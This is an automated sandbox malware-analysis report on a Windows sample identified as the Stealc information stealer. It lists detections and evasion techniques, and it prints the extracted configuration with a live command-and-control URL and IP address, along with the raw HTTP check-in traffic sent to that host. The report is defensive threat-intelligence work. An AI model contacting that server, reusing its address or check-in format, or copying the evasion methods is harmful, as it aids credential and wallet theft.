Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544876
MD5:264daa04defc6b3cb7cd8b682db05acd
SHA1:10f55121d698817f1960530cbec2bd1da8564a8d
SHA256:4a39c54963c15bf5b9388247e2a83ca5bbb1b69ca3e016ad75c8cea50a99a43a
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3624 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 264DAA04DEFC6B3CB7CD8B682DB05ACD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2061051331.0000000005370000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3624JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3624JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.c80000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-29T20:43:17.658007+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.c80000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 39%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C99030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00C99030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C872A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00C872A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00C8A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00C8A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00C8C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2061051331.000000000539B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2061051331.000000000539B000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C940F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C8E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C947C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C8F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C81710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C81710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C8DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C94B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C94B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C93B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C93B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C8BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C8EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C8DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 45 41 42 45 43 46 38 41 39 34 32 31 33 38 31 30 34 36 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"2DEABECF8A942138104604------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"tale------HDGCFHIDAKECFHIEBFCG--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C862D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00C862D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 45 41 42 45 43 46 38 41 39 34 32 31 33 38 31 30 34 36 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"2DEABECF8A942138104604------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"tale------HDGCFHIDAKECFHIEBFCG--
                Source: file.exe, 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/$
                Source: file.exe, 00000000.00000002.2103784412.0000000001554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/405117-2476756634-1003
                Source: file.exe, 00000000.00000002.2103784412.0000000001554000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2103784412.0000000001569000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2103784412.0000000001569000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2103784412.0000000001569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php_
                Source: file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/~gq
                Source: file.exe, file.exe, 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2061051331.000000000539B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC00980_2_00CC0098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F20_2_010E31F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E002E0_2_010E002E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDB1980_2_00CDB198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB21380_2_00CB2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC42880_2_00CC4288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEE2580_2_00CEE258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010693ED0_2_010693ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DE2300_2_010DE230
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFD39E0_2_00CFD39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108C2950_2_0108C295
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0B3080_2_00D0B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E82D00_2_010E82D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC45A80_2_00CC45A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CED5A80_2_00CED5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAE5440_2_00CAE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA45730_2_00CA4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D74CA0_2_010D74CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC66C80_2_00CC66C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D096FD0_2_00D096FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFA6480_2_00CFA648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF67990_2_00CF6799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D66C90_2_010D66C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDD7200_2_00CDD720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEF8D60_2_00CEF8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDB8A80_2_00CDB8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD98B80_2_00CD98B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DC9970_2_010DC997
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD48680_2_00CD4868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010169F10_2_010169F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010EB8390_2_010EB839
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D98B60_2_010D98B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE8BD90_2_00CE8BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF0B880_2_00CF0B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF4BA80_2_00CF4BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F82CA00_2_00F82CA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E4DB40_2_010E4DB4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFAC280_2_00CFAC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD4DC80_2_00CD4DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD5DB90_2_00CD5DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDBD680_2_00CDBD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB1D780_2_00CB1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEAD380_2_00CEAD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF1EE80_2_00CF1EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D3F900_2_010D3F90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC8E780_2_00CC8E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01027E1D0_2_01027E1D
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00C84610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: iuotgoma ZLIB complexity 0.9950269020915429
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C99790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00C99790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C93970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00C93970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\VLLCSI2L.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 39%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2127360 > 1048576
                Source: file.exeStatic PE information: Raw size of iuotgoma is bigger than: 0x100000 < 0x19c600
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2061051331.000000000539B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2061051331.000000000539B000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.c80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iuotgoma:EW;ujumrvwn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iuotgoma:EW;ujumrvwn:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C99BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C99BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x21457b should be: 0x211c49
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: iuotgoma
                Source: file.exeStatic PE information: section name: ujumrvwn
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100310B push 078BDE3Bh; mov dword ptr [esp], esp0_2_01003197
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100310B push ecx; mov dword ptr [esp], eax0_2_010031AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100310B push 2FD7EA51h; mov dword ptr [esp], edx0_2_01003217
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAA0DC push eax; retf 0_2_00CAA0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115F109 push ebx; mov dword ptr [esp], edi0_2_0115F146
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAE0AA push esi; mov dword ptr [esp], edi0_2_00FAE134
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0117014D push ecx; mov dword ptr [esp], ebp0_2_011701CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118018E push 59CC6C41h; mov dword ptr [esp], eax0_2_011801CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118018E push edi; mov dword ptr [esp], 75A76F31h0_2_0118021E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A9186 push edi; mov dword ptr [esp], 5C7B36DFh0_2_013A9187
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A9186 push ebx; mov dword ptr [esp], edx0_2_013A91A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A9186 push 0377B707h; mov dword ptr [esp], ecx0_2_013A9291
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A9186 push 1168DDA5h; mov dword ptr [esp], eax0_2_013A92AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A9186 push eax; mov dword ptr [esp], ebx0_2_013A92DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114F1C4 push 2F44066Bh; mov dword ptr [esp], edi0_2_0114F1D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114F1C4 push 0304AFC6h; mov dword ptr [esp], ebx0_2_0114F32B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011631CD push esi; mov dword ptr [esp], edx0_2_01163214
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011631CD push 51B55B4Bh; mov dword ptr [esp], eax0_2_01163239
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011631CD push esi; mov dword ptr [esp], ebp0_2_01163262
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011631CD push 2553DE1Ah; mov dword ptr [esp], edx0_2_011632A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011871FD push ebp; mov dword ptr [esp], 47FE245Bh0_2_0118721D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B91E3 push eax; mov dword ptr [esp], esp0_2_011B9220
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push edi; mov dword ptr [esp], eax0_2_010E31F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push ebp; mov dword ptr [esp], 55206004h0_2_010E32D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push ebp; mov dword ptr [esp], 74FE1FF7h0_2_010E3331
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push edi; mov dword ptr [esp], eax0_2_010E33FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push esi; mov dword ptr [esp], edx0_2_010E347B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push 553AF153h; mov dword ptr [esp], edx0_2_010E34C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push 2DA5B1AFh; mov dword ptr [esp], eax0_2_010E3533
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push 489A9AB2h; mov dword ptr [esp], ebp0_2_010E359C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push ebx; mov dword ptr [esp], 4AD38300h0_2_010E35A0
                Source: file.exeStatic PE information: section name: iuotgoma entropy: 7.954742797276652

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
